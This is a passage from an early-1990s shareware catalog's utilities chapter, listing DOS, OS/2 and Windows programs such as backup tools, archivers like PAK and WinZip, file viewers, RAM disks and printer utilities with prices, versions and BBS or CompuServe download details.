support;Certificate for $7 off a subscription to + Shareware Magazine; free CompuServe Membership. + Look for: MSCOPY??.ZIP on BBSs (call 301-596-1180 to download it + at no charge); MSC??.ZIP in IBMHW forum LIB 1 on CompuServe. + Download size: 145k + Description: + "Make copies of optical disks while using only one optical + drive!" Make backup copies of: + * Bernoulli Box disks + * Erasable Optical + * "Super Floppies" + * WORM Disks + * Removable/Portable hard drives + Backup copies of disks can be made while using only one + removable disk drive (No need to buy a second drive.). Copies + any size removable DOS disk, regardless of the available hard + disk space. Files larger than your hard drive can be copied. + + Product: Painless Menu Manager + Menuing system for Hard Disks. See full description on + page 98. + + Product: PAK + Archiver, reads and writes PAK, ARC, ZIP. See full description + on page 35. + + Product: PCOPY + COPY/MOVE files with all popular options. See full description + on page 20. + + Product: Point & Shoot Backup/Restore + Needs: IBM PC, DOS 2.0 or better. Hard disk, 320k RAM. + Author: Applied Micro Systems Technology, 405-377-0444 + Registration: $35.00 + Version: 2.1 (10-01-90) + User benefits: Disk with latest version, manual, free support and + update notices. + Look for: availability unknown on BBSs; PASBR2.ZIP in IBMSYS + forum LIB 6 on CompuServe. + Download size: 90k + Description: + Backup up to 1MB per minute! Provides safe, quick backups of + hard disk files to floppy disks, and efficient restoration of + backup disks to hard disk. Features include automatic disk + formatting, extensive error checking, up to 10 user-defined + backup configurations, multiple subdirectory definitions with + or without trailing directories, optional disk formatting, file + + Chapter 2, "Utilities" 33 + + + + compression, and pattern matched file searches. Restore to + another drive or directory and select individual files. + + Product: STAFF-UTIL + Utilities for the maintenance-update of DBFs. See full + description on page 151. + + Product: Stamper + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 1.11 (01-01-92) + User benefits: Eligibility for free upgrades. + Look for: STAMD111.EXE on BBSs. + Download size: 10k + Description: + Changes file date/time stamps. Great for programmers who want + to manipulate MAKE programs. Also useful when using hard disk + backup programs that use file date/time stamps. + + 2.2.2 Encryption & security + + See also: Utilities, Security programs (page 106). + + Product: Attribution + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 1.12 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: ATTRD112.ZIP on BBSs; ATTRD1.ZIP in IBMSYS forum LIB 1 + on CompuServe. + Download size: 16k + Description: + Changes or displays file or directory attributes (hidden, + system, read only & archive). Protects software & data from + accidental (or malicious) modification or deletion. Can also + hide sensitive directories & files. + + Product: Except + Temporarily protect files. See full description on page 73. + + Chapter 2, "Utilities" 34 + + + + Product: FILE PATCH + Needs: IBM PC, DOS 2.1 or better. 256k RAM. + Author: MORSOFT, 512-561-0731 + Registration: $14.95 + Version: 2.0 (07-01-89) + User benefits: Printed manual, phone support. + Look for: availability unknown on BBSs; FILEPA.ZIP in IBMSYS + forum LIB 6 on CompuServe; FILEPATC.ZIP in IBMPC RTC LIB 5 on + GEnie. + Download size: 90k + Description: + An excellent file manipulation program providing the ability at + the byte level, and in ASCII or HEX, for on screen viewing, + dumping to the printer, modifying, creating, or extracting all + or portions of any file up to 10 megabytes in size. Easy to use + and powerful. A must for programmers, Information Centers, PC + consultants, etc. + + Product: Flu_Shot+ + Virus Detection/Prevention via active monitor. See full + description on page 107. + + Product: FormGen Utility Pak #1 + Super useful DOS utility kit. See full description on page 25. + + Product: An Ounce Of Prevention + Disaster-prevention/data-protection system. See full + description on page 106. + + Product: Professional Master Key + Unerase, hex editor, unformat, disk map, etc. See full + description on page 20. + + Product: Shredder/2 + Securely erases files. See full description on page 107. + + Product: STAFF-UTIL + Utilities for the maintenance-update of DBFs. See full + description on page 151. + + Product: Utility_Belt + .BAT file enhancements. See full description on page 68. + + 2.2.3 File archivers + + Product: 4ZIP/4UNZIP + Includes 4DOS file descriptions in ZIP files. See full + description on page 112. + + Product: Directory Freedom + Compact file manager and application launcher. See full + description on page 7. + + Chapter 2, "Utilities" 35 + + + + Product: FLEXIBAK Plus [***] + Flexible Hard Disk Backup System. See full description on + page 30. + + Product: LambChop + Chop & Unchop files across multiple drives. See full + description on page 31. + + Product: OffLoad + Needs: IBM PC, DOS 3.0 or better. 640k RAM, hard disk, one + floppy drive. + Author: FBN Software, 408-446-9039 + Registration: $49.95 + Version: 1.1 (03-01-91) + User benefits: Printed manual and latest version on disk, pre- + printed labels for your archive disks, beta test new versions. + Look for: OFLOD*.EXE (multiple files) on BBSs; OFLOD*.EXE in + IBMSYS forum LIB 6 (multiple files) on CompuServe. + Download size: 370k + Description: + Offload is a new concept. It is not a general purpose archive + such as PKZIP. OffLoad and its associated utilities allow you + to identify files that really do not need to be on your hard + disk, compress them and move them off to floppies. It maintains + a catalog to allow you to track and restore any file from the + archive automatically. Think of it as file manager, archiver, + and disk cataloger all in one. It will let you free up hard + disk space and maintain control of your files. + + Product: PAK + Needs: IBM PC, DOS 2.0 or better. + Author: NoGate Consulting, 616-530-9950 + Registration: $15.00 + Version: 2.51 (10-08-90) + User benefits: Free BBS and phone support, mailed notice of new + versions. + Look for: PAK251.EXE on BBSs (call 616-530-3392 to download it at + no charge); PAK251.EXE in IBMNEW forum LIB 2 on CompuServe; + PAK251.EXE in IBMPC RTC LIB 5 on GEnie. + Download size: 100k + Description: + * Reads and writes PAK, ARC, and ZIP files + * Easily convert from any format to any other + * Create royalty-free self-extracting archives + * Full path support in self-extracting archives + * Fast updates via the NoGate BBS + * Unlimited comment size + * File sorting by name, date, extension, or length + * Extremely flexible interface - customize to suit your + needs + * Windowed full-screen edition available + * Programmer's toolkit adds compression to your programs + + Chapter 2, "Utilities" 36 + + + + Product: PMZIP + Needs: IBM AT (80286), OS/2 1.0 or better. PKZIP/PKUNZIP. + Author: Nico Mak + Registration: $29.00 + Version: 1.00 (01-14-91) + User benefits: Master disks, CompuServe/BIX/mail support. + Shareware disks of other programs. + Look for: availability unknown on BBSs; PMZIP.ZIP in IBMOS2 forum + LIB 1 on CompuServe. + Download size: 70k + Description: + An OS/2 Presentation Manager ZIP shell featuring + v/ Point and click SAA/CUA compliant interface for adding, + deleting, extracting, and viewing members of a ZIP file + v/ Multi-selection list box with the names, sizes, and date/ + time stamps of files in a ZIP file (double-click on a file + to view it) + v/ Extensive online hypertext help/documentation + v/ Easy installation + v/ All options can be saved and restored + v/ Support for File Manager Drag and Drop interface + + Product: QFiler + Simple, powerful with 2 side-by-side windows. See full + description on page 103. + + Product: Shez [***] + Needs: IBM PC, DOS 2.1 or better. LIST program and one or more + compression programs: PKZIP, LHA, ARJ, ZOO, or PAK. + Author: California Software Design + Registration: $39.00 + Version: 7.0 (03-30-92) + User benefits: Master disks, unlimited BBS/CompuServe/GEnie/mail + support. + Look for: SHEZ70.ZIP on BBSs (call 707-538-8710 to download it at + no charge); SHEZ70.ZIP in IBMSYS forum LIB 6 on CompuServe; + SHEZ70.ZIP in IBMPC RTC LIB 0 on GEnie. + Download size: 189k + Description: + A program shell designed to make working with compressed files + a much eaiser task. Can handle ZIP, ARC, ZOO, LZH, PAK, AND + ARJ compressed files. The user can use drop down menus to + manage their compressed files, or built in hotkeys can be used + for the more advanced user. Provides built-in context + sensitive help for all functions, and provides a common + interface to all of the supported compressed file formats. You + can view, create, modify, convert, virus-check, and much more. + + Chapter 2, "Utilities" 37 + + + + Product: SLIM + Needs: IBM PC, DOS 2.0 or better. + Author: Dominic Herity + Registration: $45.00 + Version: 1.10 (02-20-91) + User benefits: Printed manual. Upgrade to current version. + Special Offer on further upgrades. Application Support. + Look for: availability unknown on BBSs; SLIM11.EXE in IBMSYS + forum LIB 6 on CompuServe. + Download size: 38k + Description: + A powerful file compressor with RAM resident transparent + expander, which gives painless access to compressed files. This + is done by intercepting DOS calls, allowing applications to + read compressed files just as before. So there is no need to + worry about technicalities like archives. Just add the command + 'SLIM ON' to AUTOEXEC.BAT and forget it. Over half of SLIM Ver + 1.00/1.01 users who answered a questionnaire said it let them + postpone or cancel a hard disk upgrade. + + Product: WinZip + Needs: IBM AT (80286), Windows 3.0 or better. PKZIP/PKUNZIP and/ + or LHA. + Author: Nico Mak + Registration: $29.00 + Version: 3.00 (12-17-92) + User benefits: Master disks, CompuServe/BIX/mail support. + Shareware disks of other programs. + Look for: WINZIP*.ZIP on BBSs; WINZIP.ZIP in WINADV forum LIB 11 + on CompuServe. + Download size: 96k + Description: + Windows ZIP/LZH/SFX/ARC shell featuring an intuitive point and + click interface. View, Run, Extract, Add, and Delete files in + archives. Includes configurable Virus Scanning support. The + main window contains a tool bar and sortable scrollable list of + files in an archive. Double click in the list to view a file + with the appropriate application. Features extensive help and + easy installation. Optionally creates temporary Program + Manager group with icons for each file in an archive. + + Product: ZiPaper + Randomly select Wallpaper - store compressed! See full + description on page 317. + + 2.2.4 File comparison + + Product: DOS Extensions for Professional + A cohesive pkg of 7 powerful disk utilities. See full + description on page 15. + + Chapter 2, "Utilities" 38 + + + + Product: FCOMP [***] + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Author: Gamma Software, 303-667-9960 + Registration: $15.00 + Version: 1.01 (01-10-92) + User benefits: Printed manual, master disks. + Look for: FCOMP101.ZIP on BBSs; FCOMP1.ZIP in IBMNET forum LIB 6 + on CompuServe; FCOMP101.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 112k + Description: + Compares 2 text files and displays their differences. It is + fast, friendly and easy to use. This program is especially + useful to programmers who want to identify changes made in a + source file from one version to the next. It can operate in + batch or interactive mode. Interactive mode features a windows- + like file selection menu and a scrollable display of the + comparison. Comparison menu options include: locate next diff, + print and save to file. Mouse, EGA 43/VGA 50 line modes + supported. + + Product: SHERLOCK + Needs: IBM PC, DOS 2.1 or better. + Author: Gulf Sierra, 301-460-0354 + Registration: $25.00 + Version: 2.60 (07-04-91) + User benefits: Master disks, phone/mail support. Bonus + utilities. Shareware disks of other programs. + Look for: SHERLK26.ZIP on BBSs (call 202-547-2008 to download it + at no charge); SRLK26.ZIP in IBMAPP forum LIB 1 on CompuServe. + Download size: 121k + Description: + A text comparison utility, compares two ASCII files line by + line. Displays five lines from each file in separate windows. + You may scroll either or both files passed the mismatch to put + them in sync and continue. Either file can be automatically + scanned to locate a line matching the line selected in the + other file. Contains features for searching, jumping around the + files and copying lines to a printer. This is a tool for + programmers and writers. + + 2.2.5 File conversion + + See also: Writing applications, File format translators + (page 128); Database applications, File format translators + (page 147); Communications, File format translators (page 167); + Finances, File format translators (page 229); Graphics, File + format translators (page 311). + + Product: DOS Extensions for Professional + A cohesive pkg of 7 powerful disk utilities. See full + description on page 15. + + Chapter 2, "Utilities" 39 + + + + Product: TDisplay [***] + Needs: Unknown. + Author: Trinity Software, 703-791-2576 + Registration: $39.00 + Version: 1.2 (02-03-92) + User benefits: Printed manual, master disks, support, free + updates, upgrade discounts, bonus utilities. + Look for: availability unknown on BBSs; TDSP12.ZIP in DTPFORUM + forum LIB 7 on CompuServe; TDSP12.ZIP in IBMPC RTC LIB 15 on + GEnie. + Download size: 76k + Description: + Converts ASCII text to self-displaying .EXE file. Prints at the + touch of a hot-key. User can control background color, up to 4 + text colors per file, border type (or none), margins. Unlimited + file size; scrolling and word-wrap; user key prompt line. + Optional password protection. + + 2.2.6 File viewers + + See also: Writing applications (page 116). + + Product: Browse/2 + Needs: IBM AT (80286), OS/2 1.1 or better. + Author: Wolf Software Design, 619-292-7706 + Registration: $25.00 + Version: 1.34 (07-26-91) + User benefits: Copy of current version, one free upgrade and + notice of future upgrades. + Look for: availability unknown on BBSs; BROWSE.ARC in IBMOS2 + forum LIB 2 on CompuServe. + Download size: 35k + Description: + This OS/2 Presentation Manager file viewer displays files of + any size in ASCII or hexadecimal format with both horizontal + and vertical scrolling. + + The file, or selected portions of it, can be copied to the + Presentation Manager clipboard or output to a printer. + + The search feature locates words or phrases and displays them + in context. User options include a choice of display fonts and + sizes, line numbering, tab stop intervals and printer controls. + + Product: DOS Extensions for Professional + A cohesive pkg of 7 powerful disk utilities. See full + description on page 15. + + Product: TDisplay [***] + Creates Customized Self-Displaying Text Files. See full + description on page 38. + + Chapter 2, "Utilities" 40 + + + + Product: Technical Editor + DOS/OS2 Programmers/Text editor (VIRTUAL). See full + description on page 120. + + + 2.3 Hardware utilities + + 2.3.1 CPU & memory utilities + + Product: AutoCon [***] + Autoexec/Config reconfiguration manager. See full description + on page 69. + + Product: dBF-View + DBF File viewer plus other usefull Utilities. See full + description on page 150. + + Product: HiMOVE + Needs: IBM PC, DOS 3.0 or better. 286 NEAT CHIPSet or NEATsx + CHIPSet or AT/386 CHIPSet or other upper memory hardware. + Author: C.Sitte Softwaretechnik + Registration: $40.00 + Version: 2.14 (11-01-90) + User benefits: current disk, printed manual, six month free + support, notification of next upgrade. + Look for: HIMOV???.* on BBSs; MOV*.* in IBMSYS forum LIB 3 on + CompuServe. + Download size: 115k + Description: + Uses the shadow RAM of Computers with NEAT-Chipset (Chips & + Technologies) to load device drivers and resident programs into + unused areas of the upper memory area. Easy installation and + configuration. No editing of AUTOEXEC.BAT or CONFIG.SYS files. + + Product: Nifty James' RAM Disk + Needs: IBM PC, DOS 2.0 or better. EMS or XMS memory. + Author: Mike Blaszczak, 203-292-1356 + Registration: $15.00 + Version: 1.40 (01-01-91) + User benefits: Upgrade discounts. + Look for: availability unknown on BBSs; NJRAMD.LZH in IBMSYS + forum LIB 3 on CompuServe. + Download size: 20k + Description: + A RAM Disk for IBM computers having EMS or XMS memory. The + program can be configured to provide disks greater than four + megabytes, unlike many other programs. NJRAMD is very fast, + outpacing both RAMDRIVE and VIDSK from Microsoft. It is also + very small -- requiring less than 700 bytes of DOS memory. Of + course, the RAM Disk takes up as much memory as you configure + it to. + + Chapter 2, "Utilities" 41 + + + + Product: PC-INFO + Displays snapshot of system HW, SW & mem.dev. See full + description on page 71. + + Product: SWAPDOS + Needs: IBM PC, DOS 3.1 or better. + Author: Innovative Data Concepts, Inc., 215-443-9705 + Registration: $25.00 + Version: 1.00 (02-01-90) + User benefits: Printed Manual and Diskette. + Look for: availability unknown on BBSs; SWAPDS.COM in PCVENC + forum LIB 6 on CompuServe. + Download size: 35k + Description: + Lets you switch from one large application to another, keeping + your place in one while workingin the other. For example, you + can have Microsoft Word swapped to EMS or disk, while you are + looking at a Lotus 1-2-3 spreadsheet. + + 2.3.2 Keyboard utilities + + Product: BATUTIL + Batch Enhancement Language. See full description on page 63. + + Product: Newkey + Needs: IBM PC, DOS 2.0 or better. + Author: FAB Software, 508-358-6357 + Registration: $43.00 + Version: 5.4 (06-21-91) + User benefits: Printed manual. + Look for: availability unknown on BBSs; NEWKEY.ARC in IBMSYS + forum LIB 4 on CompuServe. + Download size: 190k + Description: + A keyboard macro processor which, besides allowing you to + automate repetitive command sequences, provides a shorthand + mode, display macros, menu macros, screen saver, extended + keyboard buffer, cursor speedup without overrun, cut & paste, a + full-featured macro editor, support for EMS, and many more + features. This latest version adds if functions to test the + screen and a print screen function. + + Chapter 2, "Utilities" 42 + + + + Product: STACKEY + Needs: IBM PC, DOS 2.0 or better. + Author: CTRLALT Associates + Registration: $49.00 + Version: 4.0 (12-23-91) + User benefits: Printed manual, CompuServe support. + Look for: availability unknown on BBSs; SKEY??.ZIP in IBMSYS + forum LIB 3 on CompuServe. + Download size: 360k + Description: + Has the basic function of stacking keystrokes. It uses English + like F1 for the F1 key rather than cryptic hex codes. It + includes simulated pressing of lock keys, shifts, support for + Carousel, Desqview and hotkey/screen reading script control. + + PC Magazine called it the 'ultimate batch enhancer' and PC + World and PC Computing included it in "Best of.." articles. + + Version 4.0 has a keyboard recorder and more script control, + including branching on hotkeys and screen strings. + + 2.3.3 Screen utilities + + Product: BLANK-IT [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Rhode Island Soft Systems, Inc., 401-658-4632 + Registration: $15.00 + Version: 5.1a (03-02-92) + User benefits: BBS/newsletter support, upgrades. + Look for: BLANK51A.ZIP on BBSs (call 401-658-3465 to download it + at no charge); BLANK5.ZIP in IBMHW forum LIB 3 on CompuServe; + BLANK51A.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 57k + Description: + Blacks out the computer display after a certain "time out" + period so that the computer screen won't become burned in. Burn + in is NOT uncommon and can destroy a monitor. BLANK-IT contains + several advanced features such as a quick blank "hot key" + ("Boss key"), the ability to enable/disable itself while it's + loaded, and much more. Works with all monitors, and is + compatible with Windows! Smaller and faster than the rest with + more features and excellent support! + + Product: Painless Menu Manager + Menuing system for Hard Disks. See full description on + page 98. + + Product: PBWindows + Wonderful Popup windows for PB. See full description on + page 262. + + Product: Quilt [***] + Create intriguing patterns/scrn saver option. See full + description on page 316. + + Chapter 2, "Utilities" 43 + + + + Product: Swap! [***] + Instant DOS Shell for Ventura Publisher Gem. See full + description on page 127. + + Product: Utility_Belt + .BAT file enhancements. See full description on page 68. + + 2.3.3.1 EGA/VGA + + Product: RIE - Rimrock Icon Editor + Editor for creating custom EGA/VGA text icons. See full + description on page 274. + + 2.3.4 286/386/486 utilities + + Product: HiMOVE + Upper Memory Manager. See full description on page 40. + + Product: LiteSPM + Capture serial port data in the background. See full + description on page 115. + + + 2.4 Printer utilities + + See also: Utilities, System Utilities, Screen capture + (page 72); Database applications, Mailing label systems + (page 142). + + Product: ACCU Music Printer + Prints out sheet music, transposes, etc. See full description + on page 346. + + Product: Badge-O-Magic + LaserJet Nametags Using Any dBASE III File. See full + description on page 53. + + Product: DISK SPOOL II + Needs: IBM PC, DOS 2.0 or better. + Author: Budget Software Company, 303-695 9095 + Registration: $44.00 + Version: 4.00 (06-27-91) + User benefits: Full tech support; printed manual; latest version; + mailing list; + Look for: availability unknown on BBSs; DS.EXE in IBMSYS forum + LIB 3 on CompuServe. + Download size: 30k + Description: + A valuable utility for virtually every computer installation. + It enhances all printing/plotting/graphics applications by + allowing all printing functions to occur in the background. + Furthermore, you control how data is printed, when it is + printer, and where it is printed...all by means of a + sophisticated pop-up menu. Advanced features: + + Chapter 2, "Utilities" 44 + + + + * use of Extended and/or Expanded memory + * ability to load multiple copies for driving multiple + printers + + Product: Plot-Line + Command line HP-GL background file plotter. See full + description on page 253. + + Product: Print-it [***] + Needs: IBM PC, DOS 3.0 or better. + Author: Cybernetic Software, 708-677-8358 + Registration: $10.00 + Version: 1.0 (01-11-90) + User benefits: Master disks, source code. + Look for: PRTIT10.ZIP on BBSs (call 312-764 0591 to download it + at no charge). + Download size: 8k + Description: + Takes an ASCII file and print it one record per line, with + wrap, if the line is too long. It will number the lines. At the + top of each page of the print-out is the file name and page + number. + + Product: PrintCAD + Needs: IBM PC, DOS 2.0 or better. 400k of EMS or XMS memory. + Author: Ravitz Software Inc., 606-268-4223 + Registration: $49.00 + Version: 1.10 (12-16-91) + User benefits: Mail and BBS support, printed manual and current + disk. + Look for: PCAD.ZIP on BBSs (call 606-268-0577 to download it at + no charge); PCAD.ZIP in IBMHW forum LIB 2 on CompuServe. + Download size: 76k + Description: + Provides a printer driver for AutoCAD, AutoSketch, GenCADD, + Draft Choice, PC-Draft-CAD, and other IBM/DOS CAD packages. It + prints directly from CAD software via the ADI or HP-GL pen + plotter driver. Supports Epson and IBM 9 pin printers, Epson, + Fujitsu, IBM, NEC, and Toshiba 24 pin printers, HP LaserJet, + DeskJet, and PaintJet, Canon LBP and BJ printers, IBM ExecJet, + LaserPrinter, and Quietwriters, and PostScript. User selectable + pen width, shading, color, and paper size, magnification, etc. + + Chapter 2, "Utilities" 45 + + + + Product: PrintGL + Needs: IBM PC, DOS 2.0 or better. + Author: Ravitz Software Inc., 606-268-4223 + Registration: $50.00 + Version: 1.22 (12-16-91) + User benefits: Mail and BBS support, printed manual and current + disk. + Look for: PRINTGL.ZIP on BBSs (call 606-268-0577 to download it + at no charge); PRNTGL.ZIP in IBMHW forum LIB 2 on CompuServe. + Download size: 106k + Description: + A pen plotter emulator for IBM/DOS systems. It prints or + displays HP-GL (7475, 17440) files on Epson and IBM 9 pin + printers, Epson, Fujitsu, IBM, NEC, and Toshiba 24 pin + printers, HP Laserjet, Deskjet, and PaintJet, IBM ExecJet, + Quietwriters, and LaserPrinter, Canon LBP, BJ, and BJC + printers, Kodak Color 4, PostScript printers, CGA, EGA, VGA, + and HGC displays, and outputs .PCX and .IMG files. User + selectable pen width, color, shading, and paper size, + magnification, etc. + + Product: PrintPlus + Needs: IBM PC, DOS 2.1 or better. + Author: Lambert Klein, 708-397-1221 + Registration: $23.95 + Version: 6.0 (01-01-92) + User benefits: Master disks, printed manual, utilities. Voice/ + mail/BBS support. + Look for: P6.ZIP on BBSs (call 215-623-6203 to download it at no + charge); P6.ZIP in IBMHW forum LIB 2 on CompuServe; P6.ZIP in + IBM RTC LIB 5 on GEnie. + Download size: 73k + Description: + A menu driven, mouse supported utility program. Tag and Print, + copy, move and delete files. Maintainence utilities. Paper + saving options. Prints Line numbers, Select pages, headers. + Adjustable margins and page lenght. Can tag files for + independed number of copies for each file. Can redirect to an + ASCII file. Features to tweek the output such as, Smart mode, + left space trim, strip line feeds within paragraphs. Powerful, + yet easy and very convenient to use. Continuous and single + sheets. + + Product: Rubicon Publisher + Full-Featured Typesetter With Fonts. See full description on + page 127. + + Chapter 2, "Utilities" 46 + + + + Product: TSR Download + Needs: IBM PC, DOS 2.1 or better. HP LaserJet printer, or HP + DeskJet printer with RAM cartridge. + Author: Elfring Soft Fonts, 708-377-3520 + Registration: $45.00 + Version: 2.9b (05-20-91) + User benefits: Perfect bound manual, telephone support, FONTCAT + utility. + Look for: availability unknown on BBSs; TSRDL*.ZIP in HP forum + LIB 4 (multiple files) on CompuServe. + Download size: 150k + Description: + Memory resident soft font manager for LaserJet and DeskJet + printers locates fonts automatically and displays them in + English. Compresses LaserJet soft fonts to 1/6 their normal + size. Pops up over any application program to allow easy font + control. It even remembers what fonts are in your printer. + Select or delete fonts, control line spacing plus much more. + Requires 7K of RAM as a TSR or works from the command line. + Full DOS & Windows 3.0 support. New scalable font support. + + 2.4.1 Printer control + + Product: DMP + Needs: IBM PC, DOS 2.1 or better. + Author: DMP Software, 415-341-2702 + Registration: $29.00 + Version: 2.05 (01-15-91) + User benefits: Support by CompuServe, mail & phone. Next update + free. + Look for: DMP*.* on BBSs; DMPLZH.EXE in IBMSYS forum LIB 3 on + CompuServe. + Download size: 60k + Description: + Very versatile printer driver/spooler. Spool to Expanded, + Extended, HMA and/or system memory and/or disk. Serial or + parallel printer or print to disk file. Fast spooling and + output for all types of printers including Laser, dot-matrix, + etc. Optional character conversions, many other features. + + Product: DMPLAS (Dot Matrix to LaserJet) + Translate IBM/Epson FX print to HP LaserJet. See full + description on page 54. + + Product: ESF's DeskJet Fonts & Utilities + Soft fonts, printer drivers, + utilities. See full description + on page 51. + + Product: ESF's European DeskJet Fonts + Soft fonts to print western European lang. See full + description on page 51. + + Chapter 2, "Utilities" 47 + + + + Product: ESF's European LaserJet Fonts + Soft fonts to print Western European lang. See full + description on page 55. + + Product: ESF's LaserJet Fonts & Util. + Soft fonts, printer drivers, & utilities. See full description + on page 55. + + Product: FormGen Utility Pak #1 + Super useful DOS utility kit. See full description on page 25. + + Product: JetPilot LaserJet Control + Control LJ, Select Fonts, Print Envelopes. See full + description on page 56. + + Product: LASR-MAN + Laser printer utility for multi-pages/sheet. See full + description on page 57. + + Product: LQ + Needs: IBM PC, DOS 2.0 or better. 9-pin dot matrix printer. + Author: Granny's Old-Fashioned Software, 704-264-6906 + Registration: $35.00 + Version: 2.35 (10-01-90) + User benefits: Current disk & manual, update disk, technical + support, commissions. + Look for: availability unknown on BBSs; LQ235.ZIP in IBMHW forum + LIB 2 on CompuServe. + Download size: 240k + Description: + Lets you obtains near-letter quality from 9-pin dot-matrix + printers in a variety of fonts. The program works invisibly + with your word processor so you can continue to use familiar + commands for print options such as emphasized, underline, + italics, etc. Changing fonts can be done by inserting codes or + by using LQ's pop-up window. Cs customized spooler handles + printing tasks efficiently in the background. Also included: + Font editor, banner printer, letterhead editor. + + Product: LQMATRIX + Softfonts and softfont editor for Epson LQ. See full + description on page 49. + + Chapter 2, "Utilities" 48 + + + + Product: PPRINT + Needs: IBM PC, DOS 3.0 or better. + Author: Patri-Soft, 714-352-2820 + Registration: $20.00 + Version: 5.3 (04-29-91) + User benefits: Latest version, BBS access, and updates. $45 for + package of 8 utilities with bound manual. Money Back Gurantee. + Look for: PPRINT53.ZIP on BBSs (call 714-352-2825 to download it + at no charge); PPRINT.ZIP in IBMSYS forum LIB 3 on CompuServe; + PPRINT53.ZIP in IBMPC-615 RTC LIB 5 on GEnie. + Download size: 85k + Description: + A great ASCII file printing tool providing extensive file + selection and formatting. It uses printer definition files to + support any printer. Specify print size, margins, headings, + footings, line numbering, and even data selection. Print two + pages per piece of paper on a laser printer. Scans a directory + to select multiple files to print. Set lines per page and cols + per line. Featured in Dr. File Finder's Guide to Shareware. + + Product: PrinterBUDDY [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Lenard Dean + Registration: $15.00 + Version: 2.01 (03-29-92) + User benefits: Printed manual, master disks. + Look for: PB201.EXE on BBSs (call 403-280-4938 to download it at + no charge); PB201.EXE in IBMHW forum LIB 2 on CompuServe; + PB201.LZH in IBMPC RTC LIB 5 on GEnie. + Download size: 48k + Description: + A utility that allows you to configure ANY type of printer + using the printer's built-in commands and formatting codes. + Easy to use yet very powerful. You can select printer + configurations from a menu list or from the command line + (useful in batch files). Completely customizable. In the TSR + version, you can even define your own hot key and specify how + the TSR will load into memory (ie. conventional, swap-to-EMS, + or swap-to-disk). + + Product: ZapCode Pro Printer Control + Needs: IBM PC, DOS 2.0 or better. + Author: Morton Utilities, 619-347-7563 + Registration: $22.95 + Version: 3.4 (07-01-91) + User benefits: Printed manual, master disks, 6 months support. + Look for: ZC34.EXE on BBSs (call 203-634-0370 to download it at + no charge); ZC34.ZIP in IBMHW forum LIB 2 on CompuServe. + Download size: 70k + Description: + Select fonts, reset printer, change margins and anything else + your printer is capable of doing. Use as TSR or stand-alone. + Supports all printers. Drivers included for all popular + printers. Drivers can be created or customized by user. + + Chapter 2, "Utilities" 49 + + + + Supports LPT1 to LPT3, COM1 to COM4. Will enter control codes + inside your application such as WordPerfect or Lotus 1-2-3. + Very customizable. + + 2.4.2 Bar codes + + Product: GRAB Plus(r) + Envelope Addressor & Database. See full description on + page 60. + + Product: GRAB Plus(r) for Windows + Windows Envelope Printing Utility. See full description on + page 60. + + Product: PrintEnvelope [***] + Complete mail addressing system for Windows. See full + description on page 61. + + 2.4.3 Printer specific + + Product: Citizen [***] + Needs: IBM PC, DOS 2.0 or better. Citizen MSP or Tribute + printer, 360k RAM. + Author: R.K. West Consulting + Registration: $10.00 + Version: 3.02 (01-01-92) + User benefits: Latest version, free mail support, 900-number + phone support, CIS support, upgrade notices. + Look for: CITI*.ZIP on BBSs; CTZN*.ZIP in IBMHW forum LIB 2 on + CompuServe. + Download size: 1k + Description: + This menu-driven utility lets you control the fonts on your + Citizen MSP or Tribute printer. You can also print small text + files and type envelopes from the program. + + 2.4.3.1 Epson + + Product: DMPLAS (Dot Matrix to LaserJet) + Translate IBM/Epson FX print to HP LaserJet. See full + description on page 54. + + Chapter 2, "Utilities" 50 + + + + Product: LQMATRIX + Needs: IBM PC, DOS 2.1 or better. Epson LQ printer. + Author: Jimmy Paris Software, 804-295-5496 + Registration: $19.50 + Version: 4.3 (03-15-91) + User benefits: Letter and Phone support without time limit. + Printed documentation and special prices on upgrades. + Look for: LQMTX43*.ZIP on BBSs. + Download size: 300k + Description: + Provides a user friendly environment for designing fonts for + the LQ family of dot matrix printers. It comes supplied with + over forty ready made fonts including Script, Italics, + Cyrillic, Greek, Large Type, and very attractive fonts + especially designed by talented graphic designers. The + documentation includes instructions for using the fonts with + various word processors including Word Perfect, PCWrite, and + Word. + + Product: ZapCode Pro Printer Control + Send control codes to printer(s). Customizabl. See full + description on page 48. + + 2.4.3.2 HP DeskJet + + Product: 4Print + Paper saving utility for LaserJets & DeskJets. See full + description on page 52. + + Product: 4Shell for Windows + Runs 4Print and 4Book under Windows. See full description on + page 53. + + Product: BOOKLET + PC Booklet printing utility. See full description on page 53. + + Product: BOOKLET-SCREEN + PC Booklet printing utility. See full description on page 54. + + Product: DJ-CHECK [***] + Needs: IBM PC, DOS 3.0 or better. HP DeskJet series printer, any + size checks. + Author: JMJ Software, 704-525-1472 + Registration: $14.95 + Version: 1.01 (03-01-92) + User benefits: Printed manual, one year CompuServe/mail support. + Look for: DJCHEK.ZIP on BBSs; DJCHEK.ZIP in HPPER forum LIB 5 on + CompuServe; DJCHEK.ZIP in IBMPC RTC LIB 15 on GEnie. + Download size: 60k + Description: + Print any size checks (personal or business) using any DeskJet + printer. Fully configurable for perfect printing placement on + any size check. Keeps a record on disk or each check you print, + and keeps a running balance as you print checks. + + Chapter 2, "Utilities" 51 + + + + Product: DJ-LOPE [***] + Needs: IBM PC, DOS 3.0 or better. HP DeskJet printer. + Author: JMJ Software, 704-525-1472 + Registration: $14.95 + Version: 3.0 (03-01-92) + User benefits: One year mail/CIS support, printed manual. + Look for: DJLOPE.ZIP on BBSs; DJLOPE.ZIP in HPPER forum LIB 5 on + CompuServe; DJLOPE.ZIP in IBMPC RTC LIB 15 on GEnie. + Download size: 65k + Description: + Print envelopes on the DeskJet family of printers on the fly or + from multiple databases of up to 250 adresses each. Supports + internal and cartridge fonts. Toggle return address on or off, + search, add, delete records. Supports internal and font + cartridges, prints to LPT1, 2 or 3. Easy-to-use menu driven + interface. + + Product: DJ-SLEEVE [***] + Needs: IBM PC, DOS 3.0 or better. HP DeskJet printer. + Author: JMJ Software, 704-525-1472 + Registration: $14.95 + Version: 2.0 (03-01-92) + User benefits: One year mail/CIS support, printed manual. + Look for: SLEEVE.ZIP on BBSs; SLEEVE.ZIP in HPPER forum LIB 5 on + CompuServe; SLEEVE.ZIP in IBMPC RTC 